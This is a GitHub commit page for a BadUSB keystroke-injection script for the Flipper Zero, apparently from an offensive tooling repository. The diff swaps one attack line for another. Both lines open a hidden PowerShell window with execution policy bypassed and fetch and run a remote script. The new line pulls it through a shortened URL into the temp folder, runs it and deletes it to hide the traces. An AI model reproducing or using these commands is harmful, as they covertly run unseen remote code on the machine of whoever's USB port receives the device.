Skip to content

Commit

Permalink
Update US-Keyboard.txt
Browse files Browse the repository at this point in the history
  • Loading branch information
beigeworm authored Jul 24, 2024
1 parent d3bf23e commit 47ad939
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion US-Keyboard-Layout/US-Keyboard.txt
Original file line number Diff line number Diff line change
Expand Up @@ -10,7 +10,7 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/US-Keyboard-Layout/main.ps1 | iex
STRING powershell -ep bypass -w h -c cd $env:temp; irm is.gd/3jgz85 > run.ps1; & run.ps1; sleep 1; rm run.ps1 -force
ENTER


Expand Down

0 comments on commit 47ad939

Please sign in to comment.